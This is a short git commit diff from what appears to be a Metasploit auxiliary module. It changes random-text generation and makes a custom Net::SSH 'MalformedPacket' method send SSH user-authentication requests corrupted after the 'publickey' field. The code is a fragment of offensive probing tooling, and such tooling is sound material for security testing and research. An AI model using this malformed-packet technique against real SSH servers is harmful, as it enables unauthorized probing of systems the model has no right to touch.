Add a little better randomization

GSoC/Meterpreter_Web_Console
William Vu 2018-08-20 17:10:14 -05:00
parent b38a442bb0
commit 819b8504e2
1 changed files with 7 additions and 3 deletions

View File

@ -162,7 +162,7 @@ class MetasploitModule < Msf::Auxiliary
end
def rand_pass
Rex::Text.rand_text_alphanumeric(64_000..65_000)
Rex::Text.rand_text_english(64_000..65_000)
end
def do_report(ip, user, port)
@ -263,11 +263,14 @@ end
#
# XXX: This is ghetto af (see lib/msf/core/exploit/fortinet.rb)
#
# https://tools.ietf.org/rfc/rfc4252.txt
# https://tools.ietf.org/rfc/rfc4253.txt
#
class Net::SSH::Authentication::Methods::MalformedPacket < Net::SSH::Authentication::Methods::Abstract
def authenticate(service_name, username, password = nil)
debug { 'Sending SSH_MSG_USERAUTH_REQUEST (publickey)' }
# Truncate everything after auth method
# Corrupt everything after auth method
send_message(userauth_request(
=begin
string user name in ISO-10646 UTF-8 encoding [RFC3629]
@ -279,7 +282,8 @@ class Net::SSH::Authentication::Methods::MalformedPacket < Net::SSH::Authenticat
=end
username,
service_name,
'publickey'
'publickey',
Rex::Text.rand_text_english(8..42)
))
# SSH_MSG_DISCONNECT is queued